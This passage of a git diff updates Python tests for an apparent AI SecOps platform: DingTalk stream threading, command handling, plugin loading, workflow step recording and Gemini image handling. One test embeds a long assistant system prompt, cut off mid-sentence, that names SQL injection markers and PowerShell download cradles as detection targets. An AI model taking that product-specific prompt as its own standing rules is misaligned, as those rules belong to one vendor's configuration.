+            "clientId": "dingtalk_dingecjrxh34nr6aqbit",
+            "clientSecret": "s",
+        })
+        assert error is not None
+        assert "dingtalk_" in error
+
     def test_meta_aliases(self):
         from flocks.channel.builtin.dingtalk import DingTalkChannel
         meta = DingTalkChannel().meta()
@@ -1016,25 +1028,31 @@ async def _ok_preflight(**_kw):
 
         runner = self._make_runner()
 
-        # Fake stream client whose ``start()`` returns immediately every
-        # time — the exact pathology we want to detect.
-        class _ImmediateStartClient:
+        # Fake stream client; the runner's own session method is patched below
+        # to return immediately every time, which is the pathology we want to
+        # detect.
+        class _ImmediateClient:
             def __init__(self, *_a, **_kw):
-                self.start_calls = 0
                 self.websocket = None
 
             def register_callback_handler(self, *_a, **_kw):
                 pass
 
-            async def start(self):
-                self.start_calls += 1
-
             def close(self):
                 pass
 
         monkeypatch.setattr(
             stream_mod.dingtalk_stream, "DingTalkStreamClient",
-            _ImmediateStartClient,
+            _ImmediateClient,
+        )
+
+        async def _immediate_session(_runner):
+            return None
+
+        monkeypatch.setattr(
+            stream_mod.DingTalkStreamRunner,
+            "_start_stream_client_session",
+            _immediate_session,
         )
 
         with pytest.raises(stream_mod.DingTalkStreamStallError) as exc_info:
@@ -1078,19 +1096,6 @@ def __init__(self, *_a, **_kw):
             def register_callback_handler(self, *_a, **_kw):
                 pass
 
-            async def start(self):
-                call_count["n"] += 1
-                if call_count["n"] == 1:
-                    # Simulate a healthy run: deliver one message,
-                    # then return cleanly.  The runner counts
-                    # ``_messages_received`` directly, so we bump it
-                    # before returning to mimic an inbound frame.
-                    runner._messages_received += 1
-                    return
-                # On the 2nd call, stop the runner so the loop exits
-                # without further iterations.
-                runner._running = False
-
             def close(self):
                 pass
 
@@ -1099,10 +1104,69 @@ def close(self):
             _MixedClient,
         )
 
+        async def _mixed_session(_runner):
+            call_count["n"] += 1
+            if call_count["n"] == 1:
+                # Simulate a healthy run: deliver one message, then return
+                # cleanly.  The runner counts ``_messages_received`` directly,
+                # so we bump it before returning to mimic an inbound frame.
+                runner._messages_received += 1
+                return
+            # On the 2nd call, stop the runner so the loop exits without
+            # further iterations.
+            runner._running = False
+
+        monkeypatch.setattr(
+            stream_mod.DingTalkStreamRunner,
+            "_start_stream_client_session",
+            _mixed_session,
+        )
+
         await asyncio.wait_for(runner.run(), timeout=2.0)
         # Counter MUST have reset after the run that delivered a message.
         assert runner._consecutive_short_runs == 0
 
+    @pytest.mark.asyncio
+    async def test_blocking_open_connection_does_not_block_event_loop(self):
+        """Regression for the production freeze: SDK open_connection is sync.
+
+        The runner must push that call into a worker thread so a slow gateway
+        request cannot block FastAPI's main event loop.
+        """
+        runner = self._make_runner()
+        entered = threading.Event()
+
+        class _BlockingClient:
+            websocket = None
+
+            def pre_start(self):
+                pass
+
+            def open_connection(self):
+                entered.set()
+                time.sleep(0.2)
+                return None
+
+        runner._stream_client = _BlockingClient()
+        runner._running = True
+
+        started_at = time.monotonic()
+        task = asyncio.create_task(runner._start_stream_client_session())
+        try:
+            while not entered.is_set():
+                await asyncio.sleep(0)
+
+            await asyncio.sleep(0.02)
+            assert time.monotonic() - started_at < 0.1
+            assert not task.done()
+
+            with pytest.raises(RuntimeError):
+                await asyncio.wait_for(task, timeout=1.0)
+        finally:
+            if not task.done():
+                task.cancel()
+                await asyncio.gather(task, return_exceptions=True)
+
     @pytest.mark.asyncio
     async def test_dispatch_queue_drops_overflow_without_blocking(
         self, monkeypatch,
@@ -1208,6 +1272,35 @@ async def test_enqueue_before_pool_started_does_not_crash(self):
         assert runner._messages_received == 1
         assert runner._dropped_messages == 0  # no QueueFull, just no queue
 
+    @pytest.mark.asyncio
+    async def test_enqueue_from_thread_hops_to_owner_loop(self):
+        """SDK callbacks from a non-owner thread must not touch asyncio.Queue."""
+        runner = self._make_runner(account_overrides={
+            "dispatchWorkers": 1,
+            "dispatchQueueSize": 2,
+        })
+        runner._loop = asyncio.get_running_loop()
+        runner._dispatch_queue = asyncio.Queue(
+            maxsize=runner._dispatch_queue_size,
+        )
+        message = SimpleNamespace(text="from-thread")
+
+        thread = threading.Thread(
+            target=runner._enqueue_dispatch,
+            args=(message,),
+        )
+        thread.start()
+        thread.join(timeout=1.0)
+        assert not thread.is_alive()
+
+        for _ in range(20):
+            if runner._messages_received == 1:
+                break
+            await asyncio.sleep(0.01)
+
+        assert runner._messages_received == 1
+        assert runner._dispatch_queue.get_nowait() is message
+
     def test_permanent_error_hierarchy(self):
         """``DingTalkStreamStallError`` MUST inherit from
         ``DingTalkPermanentError`` so :meth:`DingTalkChannel._classify_and_raise`
diff --git a/tests/command/test_handler_json_args.py b/tests/command/test_handler_json_args.py
new file mode 100644
index 000000000..d9a901db0
--- /dev/null
+++ b/tests/command/test_handler_json_args.py
@@ -0,0 +1,45 @@
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.command.handler import handle_slash_command
+from flocks.input.events import ParsedCommand
+
+
+@pytest.mark.asyncio
+async def test_handle_slash_command_forwards_structured_arguments():
+    send_text = AsyncMock()
+    send_prompt = AsyncMock()
+
+    with patch("flocks.command.handler.run_direct_command", new=AsyncMock()) as run_mock:
+        run_mock.return_value.handled = True
+        run_mock.return_value.prompt = None
+        run_mock.return_value.clear_screen = False
+        run_mock.return_value.clear_history = False
+        run_mock.return_value.text = "ok"
+
+        handled = await handle_slash_command(
+            '/agents {"team":"blue"}',
+            parsed_command=ParsedCommand(
+                raw_text='/agents {"team":"blue"}',
+                command_name="agents",
+                canonical_name="agents",
+                args='{"team":"blue"}',
+                args_json={"team": "blue"},
+            ),
+            send_text=send_text,
+            send_prompt=send_prompt,
+        )
+
+    assert handled is True
+    run_mock.assert_awaited_once_with(
+        "agents",
+        args='{"team":"blue"}',
+        args_json={"team": "blue"},
+        surface=None,
+        session_id=None,
+    )
+    send_text.assert_awaited_once_with("ok")
+    send_prompt.assert_not_called()
diff --git a/tests/command/test_help_format.py b/tests/command/test_help_format.py
index c1ad20b85..18dc2960f 100644
--- a/tests/command/test_help_format.py
+++ b/tests/command/test_help_format.py
@@ -11,6 +11,7 @@ def test_list_help_commands_filters_by_surface(self):
         names = {command.name for command in commands}
 
         assert "help" in names
+        assert "goal" in names
         assert "mcp" in names
         assert "model" not in names
         assert "status" not in names
@@ -49,6 +50,7 @@ def test_agent_safe_help_only_lists_agent_safe_direct_commands(self):
         assert "/agents" in output
         assert "/workflows" in output
         assert "/mcp" in output
+        assert "/goal" not in output
         assert "/clear" not in output
         assert "/plan" not in output
         assert "/compact" not in output
diff --git a/tests/hub/test_bundled_tools.py b/tests/hub/test_bundled_tools.py
index a14b1a52b..16436e7c3 100644
--- a/tests/hub/test_bundled_tools.py
+++ b/tests/hub/test_bundled_tools.py
@@ -22,7 +22,12 @@
 import yaml
 
 from flocks.hub import catalog, local
-from flocks.hub.installer import _resolve_install_destination, install_plugin, uninstall_plugin
+from flocks.hub.installer import (
+    _refresh_runtime,
+    _resolve_install_destination,
+    install_plugin,
+    uninstall_plugin,
+)
 from flocks.hub.models import HubPluginManifest
 from flocks.hub.security import SKIP_NAMES, validate_package
 
@@ -129,6 +134,33 @@ def _write_bundled_tool(
 # _bundled_tool_roots
 # ---------------------------------------------------------------------------
 
+
+@pytest.mark.asyncio
+async def test_tool_runtime_refresh_clears_device_template_cache(monkeypatch):
+    from flocks.config import api_versioning
+    from flocks.tool.device import plugin_index
+    from flocks.tool.registry import ToolRegistry
+
+    calls: list[str] = []
+    monkeypatch.setattr(ToolRegistry, "init", classmethod(lambda cls: calls.append("init")))
+    monkeypatch.setattr(
+        ToolRegistry,
+        "refresh_plugin_tools",
+        classmethod(lambda cls: calls.append("refresh")),
+    )
+    monkeypatch.setattr(
+        api_versioning,
+        "discover_api_service_descriptors",
+        lambda *, refresh=False: calls.append(f"discover:{refresh}") or [],
+    )
+    plugin_index._template_cache = []
+
+    await _refresh_runtime("device")
+
+    assert plugin_index._template_cache is None
+    assert calls == ["init", "refresh", "discover:True"]
+
+
 class TestBundledToolRoots:
     def test_discovers_api_subdir_plugins(self, isolated_hub):
         _write_bundled_tool(
diff --git a/tests/ingest/test_kafka_manager.py b/tests/ingest/test_kafka_manager.py
index 4fe838823..199d8d2ac 100644
--- a/tests/ingest/test_kafka_manager.py
+++ b/tests/ingest/test_kafka_manager.py
@@ -21,6 +21,7 @@
 import pytest
 
 from flocks.ingest.kafka import manager as kafka_manager
+from flocks.workflow import execution_store
 from flocks.workflow.triggers.models import TriggerDefinition
 
 
@@ -257,6 +258,7 @@ async def test_trigger_workflow_compacts_kafka_execution_record(
     captured_input_params: dict = {}
     captured_exec_data: dict = {}
     captured_run_kwargs: dict = {}
+    recorded_steps: list[tuple[str, int, dict]] = []
 
     async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_id=None):  # noqa: ANN001
         captured_input_params.update(input_params or {})
@@ -265,9 +267,31 @@ async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_
     async def _fake_record_execution_result(workflow_id, exec_id, exec_data):  # noqa: ANN001
         captured_exec_data.update(exec_data)
 
+    async def _fake_record_execution_step(exec_id, step_index, step):  # noqa: ANN001
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
     def _fake_run_workflow(**kwargs):  # noqa: ANN003
         captured_run_kwargs.update(kwargs)
         large_alert = {"raw_log_id": "alert-1", "req_body": "x" * 50_000}
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "receive_alert",
+                    "inputs": {"kafka_message": {"alarmData": "x" * 50_000}},
+                    "outputs": {"raw_alerts": [large_alert]},
+                }
+            )
+        )
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "dedup_and_write",
+                    "inputs": {"filtered_alerts": [large_alert]},
+                    "outputs": {"enriched_alerts": [large_alert]},
+                }
+            )
+        )
         return SimpleNamespace(
             status="SUCCEEDED",
             error=None,
@@ -275,18 +299,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
                 "enriched_alerts": [large_alert],
                 "kafka_messages": [{"raw_log_id": "alert-1"}],
             },
-            history=[
-                {
-                    "node_id": "receive_alert",
-                    "inputs": {"kafka_message": {"alarmData": "x" * 50_000}},
-                    "outputs": {"raw_alerts": [large_alert]},
-                },
-                {
-                    "node_id": "dedup_and_write",
-                    "inputs": {"filtered_alerts": [large_alert]},
-                    "outputs": {"enriched_alerts": [large_alert]},
-                },
-            ],
+            history=[],
             last_node_id="done",
             steps=2,
         )
@@ -294,6 +307,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     monkeypatch.setattr(kafka_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(kafka_manager, "record_execution_result", _fake_record_execution_result)
     monkeypatch.setattr(kafka_manager, "run_workflow", _fake_run_workflow)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
 
     await manager._trigger_workflow(
         "wf-compact",
@@ -305,12 +319,18 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     assert captured_input_params["kafka_message"]["alarmData"]["_type"] == "string"
     assert captured_input_params["kafka_message"]["alarmData"]["chars"] == 50_000
     assert captured_run_kwargs["history_mode"] == "summary"
+    assert callable(captured_run_kwargs["on_step_complete"])
     assert captured_exec_data["outputResults"] == {
         "_enriched_alerts_count": 1,
         "_kafka_messages_count": 1,
     }
-    assert captured_exec_data["executionLog"][0]["outputs"] == {"_raw_alerts_count": 1}
-    assert captured_exec_data["executionLog"][1]["inputs"] == {"_filtered_alerts_count": 1}
+    assert captured_exec_data["executionLog"] == []
+    assert captured_exec_data["stepCount"] == 2
+    assert recorded_steps[0][0] == "exec-compact"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["outputs"] == {"_raw_alerts_count": 1}
+    assert recorded_steps[1][1] == 2
+    assert recorded_steps[1][2]["inputs"] == {"_filtered_alerts_count": 1}
     assert len(json.dumps(captured_exec_data, ensure_ascii=False)) < 10_000
 
 
diff --git a/tests/ingest/test_syslog_manager_backpressure.py b/tests/ingest/test_syslog_manager_backpressure.py
index 3439553e0..13a581817 100644
--- a/tests/ingest/test_syslog_manager_backpressure.py
+++ b/tests/ingest/test_syslog_manager_backpressure.py
@@ -17,10 +17,12 @@
 from __future__ import annotations
 
 import asyncio
+from types import SimpleNamespace
 
 import pytest
 
 from flocks.ingest.syslog import manager as syslog_manager
+from flocks.workflow import execution_store
 from flocks.workflow.triggers.models import TriggerDefinition
 
 
@@ -169,6 +171,7 @@ async def test_trigger_workflow_applies_mapping_and_filter(
     manager = syslog_manager.SyslogManager()
     captured_run_kwargs: dict = {}
     recorded_exec_data: dict = {}
+    recorded_steps: list[tuple[str, int, dict]] = []
 
     async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_id=None):  # noqa: ANN001
         return {"id": "exec-syslog", "workflowId": workflow_id, "inputParams": input_params}
@@ -176,8 +179,22 @@ async def _fake_create_execution_record(workflow_id, *, input_params=None, exec_
     async def _fake_record_execution_result(workflow_id, exec_id, exec_data):  # noqa: ANN001
         recorded_exec_data.update(exec_data)
 
+    async def _fake_record_execution_step(exec_id, step_index, step):  # noqa: ANN001
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
     def _fake_run_workflow(**kwargs):  # noqa: ANN003
         captured_run_kwargs.update(kwargs)
+        kwargs["on_step_complete"](
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "receive_alert",
+                    "node_type": "python",
+                    "inputs": {"message": "demo"},
+                    "outputs": {"ok": True},
+                }
+            )
+        )
         return type(
             "RunResult",
             (),
@@ -194,6 +211,7 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     monkeypatch.setattr(syslog_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(syslog_manager, "record_execution_result", _fake_record_execution_result)
     monkeypatch.setattr(syslog_manager, "run_workflow", _fake_run_workflow)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
 
     trigger = TriggerDefinition.model_validate(
         {
@@ -220,8 +238,14 @@ def _fake_run_workflow(**kwargs):  # noqa: ANN003
     assert captured_run_kwargs["inputs"]["message"] == "demo"
     assert captured_run_kwargs["inputs"]["hostname"] == "router-a"
     assert captured_run_kwargs["inputs"]["pipeline"] == "syslog"
+    assert callable(captured_run_kwargs["on_step_complete"])
+    assert recorded_steps[0][0] == "exec-syslog"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["node_id"] == "receive_alert"
     assert recorded_exec_data["triggerId"] == "syslog-alerts"
     assert recorded_exec_data["triggerSource"] == "udp://0.0.0.0:5514"
+    assert recorded_exec_data["executionLog"] == []
+    assert recorded_exec_data["stepCount"] == 1
 
     captured_run_kwargs.clear()
     await manager._trigger_workflow(
diff --git a/tests/integration/test_capability_awareness.py b/tests/integration/test_capability_awareness.py
index 42f1471bb..0cf15ecc0 100644
--- a/tests/integration/test_capability_awareness.py
+++ b/tests/integration/test_capability_awareness.py
@@ -294,9 +294,21 @@ async def test_rex_prompt_contains_skills_section(self):
         rex = await Agent.get("rex")
         prompt = rex.prompt or ""
         assert "### Available Skills" in prompt
-        assert "Load a skill when the task clearly matches its domain expertise." in prompt
+        assert "Call `skill_load` when the task clearly matches a skill's domain expertise." in prompt
         assert "Category + Skills Delegation System" not in prompt
 
+    @pytest.mark.asyncio
+    async def test_rex_prompt_points_to_im_send_tool(self):
+        """Rex prompt 应只指向 im_send_message 工具，不内嵌完整 IM SOP。"""
+        from flocks.agent.registry import Agent
+        rex = await Agent.get("rex")
+        prompt = rex.prompt or ""
+        assert "im_send_message" in prompt
+        assert 'skill_load(name="im-send")' not in prompt
+        assert "### IM Send Protocol" not in prompt
+        assert "Execute this exact sequence" not in prompt
+        assert "IM Session Resolution for schedule_task_create" not in prompt
+
     @pytest.mark.asyncio
     async def test_rex_prompt_contains_workflow_section(self):
         """Rex prompt 应包含 workflow section。"""
diff --git a/tests/plugin/test_plugin.py b/tests/plugin/test_plugin.py
index f9a70be16..1e75807f4 100644
--- a/tests/plugin/test_plugin.py
+++ b/tests/plugin/test_plugin.py
@@ -214,6 +214,88 @@ def test_multiple_extension_points(self, tmp_path: Path):
         assert agent_items[0]["name"] == "agent-a"
         assert tool_items[0]["name"] == "tool-t"
 
+    def test_load_extension_scans_only_requested_extension(self, tmp_path: Path):
+        """Scoped loads should not scan or dispatch unrelated extension points."""
+        user_root = tmp_path / "user_plugins"
+        project_dir = tmp_path / "project"
+        _write_plugin(user_root / "agents", "user_agent.py", 'AGENTS = [{"name": "user-agent"}]\n')
+        _write_plugin(user_root / "tools", "tool.py", 'TOOLS = [{"name": "user-tool"}]\n')
+        _write_plugin(
+            project_dir / ".flocks" / "plugins" / "agents",
+            "project_agent.py",
+            'AGENTS = [{"name": "project-agent"}]\n',
+        )
+        extra_file = tmp_path / "extra.py"
+        extra_file.write_text(
+            'AGENTS = [{"name": "extra-agent"}]\n'
+            'TOOLS = [{"name": "extra-tool"}]\n'
+        )
+
+        agent_items = []
+        tool_items = []
+
+        PluginLoader._plugin_root = user_root
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="AGENTS", subdir="agents",
+            consumer=lambda items, src: agent_items.extend(items),
+            item_type=dict, dedup_key=lambda d: d["name"],
+        ))
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="TOOLS", subdir="tools",
+            consumer=lambda items, src: tool_items.extend(items),
+            item_type=dict, dedup_key=lambda d: d["name"],
+        ))
+
+        PluginLoader.load_extension(
+            "AGENTS",
+            extra_sources=[str(extra_file)],
+            project_dir=project_dir,
+        )
+
+        assert [item["name"] for item in agent_items] == [
+            "user-agent",
+            "project-agent",
+            "extra-agent",
+        ]
+        assert tool_items == []
+
+    def test_load_extension_can_load_legacy_entry_points(self, tmp_path: Path, monkeypatch):
+        """Scoped loads opt in to the legacy flocks.plugins entry-point group."""
+        loaded = []
+
+        class _FakeEntryPoint:
+            name = "fake-tools"
+
+            def load(self):
+                def _target(_loader_cls):
+                    loaded.append("entry-point-called")
+
+                return _target
+
+        class _FakeEntryPoints:
+            def select(self, *, group: str):
+                assert group == "flocks.plugins"
+                return [_FakeEntryPoint()]
+
+        PluginLoader._plugin_root = tmp_path / "user_plugins"
+        PluginLoader.register_extension_point(ExtensionPoint(
+            attr_name="TOOLS",
+            subdir="tools",
+            consumer=lambda items, src: None,
+        ))
+        monkeypatch.setattr(
+            "flocks.plugin.loader.importlib.metadata.entry_points",
+            lambda: _FakeEntryPoints(),
+        )
+
+        PluginLoader.load_extension(
+            "TOOLS",
+            project_dir=tmp_path / "project",
+            load_entry_points=True,
+        )
+
+        assert loaded == ["entry-point-called"]
+
     def test_dedup_first_wins(self, tmp_path: Path):
         agents_dir = tmp_path / "agents"
         _write_plugin(agents_dir, "a.py",
diff --git a/tests/provider/test_chinese_providers.py b/tests/provider/test_chinese_providers.py
index 642796274..92a7b1b5e 100644
--- a/tests/provider/test_chinese_providers.py
+++ b/tests/provider/test_chinese_providers.py
@@ -266,6 +266,11 @@ def test_threatbook_cn_llm_catalog(self):
         qwen = next(m for m in models if m.id == "qwen3.6-plus")
         assert qwen.capabilities.supports_vision is True
 
+        m3 = next(m for m in models if m.id == "minimax-m3")
+        assert m3.capabilities.supports_vision is True
+        assert m3.capabilities.supports_reasoning is True
+        assert m3.capabilities.interleaved["field"] == "reasoning_details"
+
         flash_cn = next(m for m in models if m.id == "deepseek-v4-flash")
         assert flash_cn.pricing.input == 1.0
         assert flash_cn.pricing.output == 2.0
diff --git a/tests/provider/test_google_gemini_fixes.py b/tests/provider/test_google_gemini_fixes.py
index dadd43ce7..747560452 100644
--- a/tests/provider/test_google_gemini_fixes.py
+++ b/tests/provider/test_google_gemini_fixes.py
@@ -19,8 +19,10 @@
 
 from __future__ import annotations
 
+import base64
 from typing import Any, Dict, List
 from unittest.mock import AsyncMock, MagicMock, patch
+from urllib.parse import quote
 
 import pytest
 
@@ -455,6 +457,83 @@ def test_convert_messages_db_exception_midloop_does_not_duplicate_history(self):
         )
         assert "memory user" in all_text, "fallback did not emit in-memory message"
 
+    def test_convert_messages_db_image_file_part_reads_bytes(self, tmp_path):
+        provider = GoogleProvider()
+        image_path = tmp_path / "screenshot.png"
+        image_path.write_bytes(b"png-bytes")
+
+        mwp = MagicMock()
+        mwp.info = MagicMock(role="user")
+        part = MagicMock()
+        part.type = "file"
+        part.mime = "image/png"
+        part.url = image_path.as_uri()
+        mwp.parts = [part]
+
+        with patch("flocks.session.message.MessageSync") as mock_ms:
+            mock_ms.list_with_parts.return_value = [mwp]
+
+            _system, gemini_msgs = provider._convert_messages(
+                [ChatMessage(role="user", content="fallback")],
+                session_id="ses_with_image",
+            )
+
+        inline = gemini_msgs[0]["parts"][0]["inline_data"]
+        assert inline["mime_type"] == "image/png"
+        assert inline["data"] == base64.b64encode(b"png-bytes").decode("utf-8")
+
+    def test_convert_messages_db_download_url_image_file_part_reads_bytes(self, tmp_path):
+        provider = GoogleProvider()
+        image_path = tmp_path / "screenshot.png"
+        image_path.write_bytes(b"png-bytes")
+
+        mwp = MagicMock()
+        mwp.info = MagicMock(role="user")
+        part = MagicMock()
+        part.type = "file"
+        part.mime = "image/png"
+        part.url = f"/api/file/download?path={quote(image_path.as_posix(), safe='')}"
+        mwp.parts = [part]
+
+        with patch("flocks.session.message.MessageSync") as mock_ms:
+            mock_ms.list_with_parts.return_value = [mwp]
+
+            _system, gemini_msgs = provider._convert_messages(
+                [ChatMessage(role="user", content="fallback")],
+                session_id="ses_with_download_url_image",
+            )
+
+        inline = gemini_msgs[0]["parts"][0]["inline_data"]
+        assert inline["mime_type"] == "image/png"
+        assert inline["data"] == base64.b64encode(b"png-bytes").decode("utf-8")
+
+    def test_convert_messages_in_memory_image_block_is_preserved(self):
+        provider = GoogleProvider()
+
+        _system, gemini_msgs = provider._convert_messages(
+            [
+                ChatMessage(
+                    role="user",
+                    content=[
+                        {"type": "text", "text": "what is this?"},
+                        {
+                            "type": "image",
+                            "mimeType": "image/png",
+                            "data": base64.b64encode(b"png-bytes").decode("utf-8"),
+                        },
+                    ],
+                )
+            ],
+            session_id=None,
+        )
+
+        parts = gemini_msgs[0]["parts"]
+        assert parts[0] == {"text": "what is this?"}
+        assert parts[1]["inline_data"] == {
+            "data": base64.b64encode(b"png-bytes").decode("utf-8"),
+            "mime_type": "image/png",
+        }
+
     @pytest.mark.asyncio
     async def test_chat_stream_passes_session_id_to_convert_messages(self):
         provider = GoogleProvider()
diff --git a/tests/provider/test_model_api_direct.py b/tests/provider/test_model_api_direct.py
index bb10cb1a8..de625b032 100644
--- a/tests/provider/test_model_api_direct.py
+++ b/tests/provider/test_model_api_direct.py
@@ -36,9 +36,9 @@ def _load_secret_config():
 MESSAGES = [{'role': 'system', 'content': 'You are Flocks, an AI-Native SecOps Platform that helps users with cybersecurity operations. Use the instructions below and the tools available to you to assist the user.\n\nIMPORTANT: Refuse to write code or explain code that may be used maliciously; even if the user claims it is for educational purposes. When working on files, if they seem related to improving, explaining, or interacting with malware or any malicious code you MUST refuse.\nIMPORTANT: Before you begin work, think about what the task you\'re working on is supposed to do. If it seems malicious, refuse to work on it or answer questions about it, even if the request does not seem malicious.\nIMPORTANT: You must NEVER generate or guess URLs for the user unless they are relevant to SecOps tasks. You may use URLs provided by the user in their messages or local files.\n\nIf the user asks for help or wants to give feedback inform them of the following: \n- /help: Get help with using Flocks SecOps\n- To give feedback, users should report the issue on the project repository\n\nWhen the user asks about your capabilities (eg "what can you do?", "can Flocks do...", "are you able..."), respond that you are an AI-Native SecOps Platform specializing in:\n- 🔍 Threat Detection & Analysis (log analysis, IOC identification, threat hunting)\n- 🚨 Incident Response (investigation, containment, remediation)\n- 🛡️ Vulnerability Assessment (scan analysis, prioritization, configuration reviews)\n- ⚙️ Security Automation (SIGMA, YARA, Snort, Suricata detection rules)\n- 🔬 Malware & Forensics (artifact analysis, malware identification)\n- 📋 Compliance & Hardening (CIS, NIST, PCI-DSS, configuration audits)\n\n# Tone and style\nYou should be concise, direct, and to the point. When you run a non-trivial bash command, you should explain what the command does and why you are running it, to make sure the user understands what you are doing (this is especially important when you are running a command that will make changes to the user\'s system).\nRemember that your output will be displayed on a command line interface. Your responses can use Github-flavored markdown for formatting, and will be rendered in a monospace font using the CommonMark specification.\nOutput text to communicate with the user; all text you output outside of tool use is displayed to the user. Only use tools to complete tasks. Never use tools like Bash or code comments as means to communicate with the user during the session.\nIf you cannot or will not help the user with something, please do not say why or what it could lead to, since this comes across as preachy and annoying. Please offer helpful alternatives if possible, and otherwise keep your response to 1-2 sentences.\nOnly use emojis if the user explicitly requests it. Avoid using emojis in all communication unless asked.\nIMPORTANT: You should minimize output tokens as much as possible while maintaining helpfulness, quality, and accuracy. Only address the specific query or task at hand, avoiding tangential information unless absolutely critical for completing the request. If you can answer in 1-3 sentences or a short paragraph, please do.\nIMPORTANT: You should NOT answer with unnecessary preamble or postamble (such as explaining your code or summarizing your action), unless the user asks you to.\nIMPORTANT: Keep your responses short, since they will be displayed on a command line interface. You MUST answer concisely with fewer than 4 lines (not including tool use or code generation), unless user asks for detail. Answer the user\'s question directly, without elaboration, explanation, or details. One word answers are best. Avoid introductions, conclusions, and explanations. You MUST avoid text before/after your response, such as "The answer is <answer>.", "Here is the content of the file..." or "Based on the information provided, the answer is..." or "Here is what I will do next...". Here are some examples to demonstrate appropriate verbosity:\n<example>\nuser: 2 + 2\nassistant: 4\n</example>\n\n<example>\nuser: what is 2+2?\nassistant: 4\n</example>\n\n<example>\nuser: is 11 a prime number?\nassistant: Yes\n</example>\n\n<example>\nuser: what command should I run to list files in the current directory?\nassistant: ls\n</example>\n\n<example>\nuser: what command should I run to watch files in the current directory?\nassistant: [use the ls tool to list the files in the current directory, then read docs/commands in the relevant file to find out how to watch files]\nnpm run dev\n</example>\n\n<example>\nuser: How many golf balls fit inside a jetta?\nassistant: 150000\n</example>\n\n<example>\nuser: what files are in the directory src/?\nassistant: [runs ls and sees foo.c, bar.c, baz.c]\nuser: which file contains the implementation of foo?\nassistant: src/foo.c\n</example>\n\n<example>\nuser: analyze these Apache logs for SQL injection attempts\nassistant: [uses read tool to load log files, searches for SQL injection patterns like UNION, OR 1=1, quotes in parameters, generates findings report with affected URLs and source IPs]\n</example>\n\n<example>\nuser: create a SIGMA rule for PowerShell download cradle detection\nassistant: [researches common PowerShell download patterns, uses read to check existing SIGMA rules for format reference, creates new rule with detection logic and MITRE ATT&CK mappings]\n</example>\n\n# Proactiveness\nYou are allowed to be proactive, but only when the user asks you to do something. You should strive to strike a balance between:\n1. Doing the right thing when asked, including taking actions and follow-up actions\n2. Not surprising the user with actions you take without asking\nFor example, if the user asks you how to approach something, you should do your best to answer their question first, and not immediately jump into taking actions.\n3. Do not add additional code explanation summary unless requested by the user. After working on a file, just stop, rather than providing an explanation of what you did.\n\n# Security Operations Best Practices\nWhen performing security analysis and automation:\n- **Evidence Preservation:** Document all findings with timestamps, file paths, line numbers, and relevant context for audit trails\n- **Data Privacy:** Be mindful of sensitive data in logs (credentials, PII, keys). Redact or reference without exposing in outputs\n- **Defensive Only:** All tools, scripts, and automation must be for defensive purposes - detection, monitoring, incident response, or compliance\n- **Verify Findings:** Validate potential security issues before declaring them as confirmed threats or vulnerabilities\n- **Context Matters:** Understand the security context - not all anomalies are malicious, consider business operations and environment\n- **Detection Quality:** When creating rules (SIGMA, YARA, Snort), balance detection coverage with false positive rates\n- **Secure Code:** When developing security tools, follow secure coding practices. Never expose secrets, use parameterized queries, validate inputs\n\n# Code style\n- IMPORTANT: DO NOT ADD ***ANY*** COMMENTS unless asked\n\n# SecOps Tasks\nThe user will primarily request you perform Security Operations tasks including:\n\n**Threat Detection & Analysis:**\n- Analyze logs (auth, web, network, system) for suspicious patterns and anomalies\n- Identify indicators of compromise (IOCs): malicious IPs, domains, file hashes, URLs\n- Hunt for threats using behavioral analysis and correlation across data sources\n- Detect attack techniques mapped to MITRE ATT&CK framework\n\n**Incident Response:**\n- Triage security alerts and determine severity/priority\n- Investigate security incidents and reconstruct attack timelines\n- Identify compromised systems, accounts, and exfiltrated data\n- Provide containment, eradication, and recovery recommendations\n\n**Vulnerability Assessment:**\n- Analyze vulnerability scan results (Nessus, OpenVAS, Qualys, etc.)\n- Prioritize vulns by CVSS score, exploitability, and business impact\n- Review security configurations for misconfigurations\n- Identify security weaknesses in code or infrastructure\n\n**Security Automation:**\n- Create detection rules (SIGMA, YARA, Snort, Suricata, Splunk, ELK)\n- Develop security scripts for log parsing, IOC extraction, threat enrichment\n- Build incident response playbooks and automation workflows\n- Parse and analyze threat intelligence feeds\n\n**Malware & Forensics:**\n- Analyze suspicious files and extract indicators\n- Review forensic artifacts (registry, filesystem, memory, network)\n- Identify malware families and associated TTPs\n\n**Compliance & Hardening:**\n- Security configuration reviews (CIS, STIG, NIST)\n- Compliance checking (PCI-DSS, HIPAA, SOC2, ISO 27001)\n- Security baseline validation and audit\n\nFor these tasks, follow these steps:\n1. **Gather:** Use read, grep, glob tools to collect relevant security data\n2. **Analyze:** Look for security indicators, patterns, anomalies\n3. **Correlate:** Link related events and build attack narratives\n4. **Document:** Record findings with evidence, timestamps, severity\n5. **Recommend:** Provide actionable remediation or response steps\n6. **Verify:** Validate findings and test detection logic when applicable\n\n- Tool results and user messages may include <system-reminder> tags. <system-reminder> tags contain useful information and reminders. They are NOT part of the user\'s provided input or the tool result.\n\n# Tool usage policy\n\nYou MUST answer concisely with fewer than 4 lines of text (not including tool use or code generation), unless user asks for detail.\n\nIMPORTANT: Refuse to write code or explain code that may be used maliciously; even if the user claims it is for educational purposes. When working on files, if they seem related to improving, explaining, or interacting with malware or any malicious code you 